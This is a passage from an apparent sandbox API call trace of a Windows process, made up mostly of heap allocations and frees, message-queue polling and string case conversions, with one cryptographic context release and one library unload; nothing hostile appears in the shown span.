lpMem=0x24b18e8 | out: hHeap=0x25c0000) returned 1 [0262.994] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d930 | out: hHeap=0x25c0000) returned 1 [0262.994] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9a68 | out: hHeap=0x25c0000) returned 1 [0262.994] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0262.994] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa038 | out: hHeap=0x25c0000) returned 1 [0262.994] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a8dc0 | out: hHeap=0x25c0000) returned 1 [0262.994] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9a68 | out: hHeap=0x25c0000) returned 1 [0262.994] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466db0 | out: hHeap=0x25c0000) returned 1 [0262.994] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18e8 | out: hHeap=0x25c0000) returned 1 [0262.994] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0262.994] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0262.995] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7e0 | out: hHeap=0x25c0000) returned 1 [0262.995] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0262.995] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0262.995] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa158 | out: hHeap=0x25c0000) returned 1 [0262.995] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0262.995] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0262.995] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a8dc0 | out: hHeap=0x25c0000) returned 1 [0262.995] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9a68 | out: hHeap=0x25c0000) returned 1 [0262.995] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa158 | out: hHeap=0x25c0000) returned 1 [0262.995] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18b8 | out: hHeap=0x25c0000) returned 1 [0262.995] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0262.995] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466db0 | out: hHeap=0x25c0000) returned 1 [0262.995] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18e8 | out: hHeap=0x25c0000) returned 1 [0262.995] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0262.995] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0262.996] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0262.996] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1a0 | out: hHeap=0x25c0000) returned 1 [0262.996] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa038 | out: hHeap=0x25c0000) returned 1 [0262.996] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a8dc0 | out: hHeap=0x25c0000) returned 1 [0262.996] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18e8 | out: hHeap=0x25c0000) returned 1 [0262.996] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0262.996] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa128 | out: hHeap=0x25c0000) returned 1 [0262.996] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1a0 | out: hHeap=0x25c0000) returned 1 [0262.996] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa038 | out: hHeap=0x25c0000) returned 1 [0262.996] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18e8 | out: hHeap=0x25c0000) returned 1 [0262.996] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18e8 | out: hHeap=0x25c0000) returned 1 [0262.996] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9a68 | out: hHeap=0x25c0000) returned 1 [0262.996] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a8dc0 | out: hHeap=0x25c0000) returned 1 [0262.996] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa038 | out: hHeap=0x25c0000) returned 1 [0262.996] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa158 | out: hHeap=0x25c0000) returned 1 [0262.996] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0262.996] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7e0 | out: hHeap=0x25c0000) returned 1 [0262.996] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8a0 | out: hHeap=0x25c0000) returned 1 [0262.997] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7e8 | out: hHeap=0x25c0000) returned 1 [0262.997] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b48 | out: hHeap=0x25c0000) returned 1 [0262.997] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1848 | out: hHeap=0x25c0000) returned 1 [0262.997] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d28 | out: hHeap=0x25c0000) returned 1 [0262.997] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ca8 | out: hHeap=0x25c0000) returned 1 [0262.997] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ab0 | out: hHeap=0x25c0000) returned 1 [0262.997] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2088 | out: hHeap=0x25c0000) returned 1 [0262.997] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0262.997] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0288 | out: hHeap=0x25c0000) returned 1 [0262.997] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9af8 | out: hHeap=0x25c0000) returned 1 [0262.997] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6508 | out: hHeap=0x25c0000) returned 1 [0262.997] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0262.997] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d50 | out: hHeap=0x25c0000) returned 1 [0262.997] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa080 | out: hHeap=0x25c0000) returned 1 [0262.997] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a58 | out: hHeap=0x25c0000) returned 1 [0262.997] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17f8 | out: hHeap=0x25c0000) returned 1 [0262.997] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a80 | out: hHeap=0x25c0000) returned 1 [0262.997] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa860 | out: hHeap=0x25c0000) returned 1 [0262.997] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0262.997] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e10 | out: hHeap=0x25c0000) returned 1 [0262.998] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa908 | out: hHeap=0x25c0000) returned 1 [0262.998] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa050 | out: hHeap=0x25c0000) returned 1 [0262.998] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9df8 | out: hHeap=0x25c0000) returned 1 [0262.998] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d50 | out: hHeap=0x25c0000) returned 1 [0262.998] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f48 | out: hHeap=0x25c0000) returned 1 [0262.998] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c00 | out: hHeap=0x25c0000) returned 1 [0262.998] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac978 | out: hHeap=0x25c0000) returned 1 [0262.998] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c90 | out: hHeap=0x25c0000) returned 1 [0262.998] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f78 | out: hHeap=0x25c0000) returned 1 [0262.998] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b56a8 | out: hHeap=0x25c0000) returned 1 [0262.998] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0262.998] CharUpperBuffW (in: lpsz="A3800201A3B", cchLength=0xb | out: lpsz="A3800201A3B") returned 0xb [0262.998] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b56a8 | out: hHeap=0x25c0000) returned 1 [0262.998] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0262.998] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0262.998] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0262.998] CharUpperBuffW (in: lpsz="SSA3800201A3B", cchLength=0xd | out: lpsz="SSA3800201A3B") returned 0xd [0262.998] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b56a8 | out: hHeap=0x25c0000) returned 1 [0262.998] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0262.998] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c00 | out: hHeap=0x25c0000) returned 1 [0262.999] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac978 | out: hHeap=0x25c0000) returned 1 [0262.999] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c90 | out: hHeap=0x25c0000) returned 1 [0262.999] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17f8 | out: hHeap=0x25c0000) returned 1 [0262.999] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0262.999] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0262.999] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7e0 | out: hHeap=0x25c0000) returned 1 [0262.999] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0262.999] CharUpperBuffW (in: lpsz="A0200903E22", cchLength=0xb | out: lpsz="A0200903E22") returned 0xb [0262.999] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b56a8 | out: hHeap=0x25c0000) returned 1 [0262.999] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0262.999] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0262.999] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0262.999] CharUpperBuffW (in: lpsz="SSA0200903E22", cchLength=0xd | out: lpsz="SSA0200903E22") returned 0xd [0262.999] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b56a8 | out: hHeap=0x25c0000) returned 1 [0262.999] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0262.999] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f48 | out: hHeap=0x25c0000) returned 1 [0262.999] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c00 | out: hHeap=0x25c0000) returned 1 [0262.999] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac978 | out: hHeap=0x25c0000) returned 1 [0262.999] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17f8 | out: hHeap=0x25c0000) returned 1 [0262.999] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0263.000] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0263.000] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7e0 | out: hHeap=0x25c0000) returned 1 [0263.000] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0263.000] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0263.000] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f48 | out: hHeap=0x25c0000) returned 1 [0263.000] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c00 | out: hHeap=0x25c0000) returned 1 [0263.000] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac978 | out: hHeap=0x25c0000) returned 1 [0263.000] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17f8 | out: hHeap=0x25c0000) returned 1 [0263.000] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0263.000] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f48 | out: hHeap=0x25c0000) returned 1 [0263.000] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c00 | out: hHeap=0x25c0000) returned 1 [0263.000] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac978 | out: hHeap=0x25c0000) returned 1 [0263.000] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466db0 | out: hHeap=0x25c0000) returned 1 [0263.000] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17f8 | out: hHeap=0x25c0000) returned 1 [0263.000] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0263.000] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac978 | out: hHeap=0x25c0000) returned 1 [0263.000] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b56a8 | out: hHeap=0x25c0000) returned 1 [0263.000] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17f8 | out: hHeap=0x25c0000) returned 1 [0263.001] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1a0 | out: hHeap=0x25c0000) returned 1 [0263.001] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9a68 | out: hHeap=0x25c0000) returned 1 [0263.001] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a8dc0 | out: hHeap=0x25c0000) returned 1 [0263.001] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0263.001] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17f8 | out: hHeap=0x25c0000) returned 1 [0263.001] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1a0 | out: hHeap=0x25c0000) returned 1 [0263.001] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9a68 | out: hHeap=0x25c0000) returned 1 [0263.001] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a8dc0 | out: hHeap=0x25c0000) returned 1 [0263.001] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0263.001] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f48 | out: hHeap=0x25c0000) returned 1 [0263.001] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c00 | out: hHeap=0x25c0000) returned 1 [0263.001] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d50 | out: hHeap=0x25c0000) returned 1 [0263.001] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9df8 | out: hHeap=0x25c0000) returned 1 [0263.001] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa050 | out: hHeap=0x25c0000) returned 1 [0263.001] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa908 | out: hHeap=0x25c0000) returned 1 [0263.001] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac978 | out: hHeap=0x25c0000) returned 1 [0263.001] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e10 | out: hHeap=0x25c0000) returned 1 [0263.001] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa860 | out: hHeap=0x25c0000) returned 1 [0263.002] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa080 | out: hHeap=0x25c0000) returned 1 [0263.002] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9af8 | out: hHeap=0x25c0000) returned 1 [0263.002] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ab0 | out: hHeap=0x25c0000) returned 1 [0263.002] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7e8 | out: hHeap=0x25c0000) returned 1 [0263.002] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ca8 | out: hHeap=0x25c0000) returned 1 [0263.002] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa158 | out: hHeap=0x25c0000) returned 1 [0263.002] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa038 | out: hHeap=0x25c0000) returned 1 [0263.002] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d930 | out: hHeap=0x25c0000) returned 1 [0263.002] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0263.002] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0263.002] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0263.002] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0263.002] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0263.002] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0263.002] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0263.002] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0263.002] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0263.003] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0263.003] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0263.003] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0263.003] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0263.003] CharUpperBuffW (in: lpsz="A0200C03718", cchLength=0xb | out: lpsz="A0200C03718") returned 0xb [0263.008] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0263.009] CharUpperBuffW (in: lpsz="SSA0200C03718", cchLength=0xd | out: lpsz="SSA0200C03718") returned 0xd [0263.009] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0263.009] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0263.009] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0263.009] CryptReleaseContext (hProv=0xad2be8, dwFlags=0x0) returned 1 [0263.009] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0263.009] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0263.009] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0263.009] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0263.010] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0263.010] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0263.010] FreeLibrary (hLibModule=0x74d40000) returned 1 [0263.010] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0263.010] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0263.010] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0263.010] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17f8 [0263.010] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1788 [0263.010] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1778 [0263.010] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466db0 [0263.010] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f78 [0263.010] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa050 [0263.010] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0263.010] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f48 [0263.010] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0263.010] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f48 | out: hHeap=0x25c0000) returned 1 [0263.010] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa050 | out: hHeap=0x25c0000) returned 1 [0263.010] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f78 | out: hHeap=0x25c0000) returned 1 [0263.010] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0263.011] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466db0 | out: hHeap=0x25c0000) returned 1 [0263.011] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0263.011] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17f8 | out: hHeap=0x25c0000) returned 1 [0263.011] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f78 [0263.011] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa050 [0263.011] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9f48 [0263.011] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9c00 [0263.011] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d50 [0263.011] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24ac978 [0263.011] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b56a8 [0263.011] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f78 | out: hHeap=0x25c0000) returned 1 [0263.011] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9f78 [0263.011] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa860 [0263.011] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e10 [0263.011] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17f8 [0263.011] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17f8 | out: hHeap=0x25c0000) returned 1 [0263.011] CloseHandle (hObject=0x268) returned 1 [0263.011] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e40 | out: hHeap=0x25c0000) returned 1 [0263.012] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0263.012] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, 